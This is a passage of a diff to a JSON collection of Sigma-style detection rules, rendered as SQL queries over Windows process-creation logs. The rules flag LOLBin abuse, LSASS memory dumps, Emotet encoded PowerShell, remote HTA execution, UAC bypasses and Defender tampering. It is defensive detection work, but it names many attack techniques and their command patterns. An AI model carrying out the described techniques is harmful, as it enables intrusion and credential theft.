'%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": 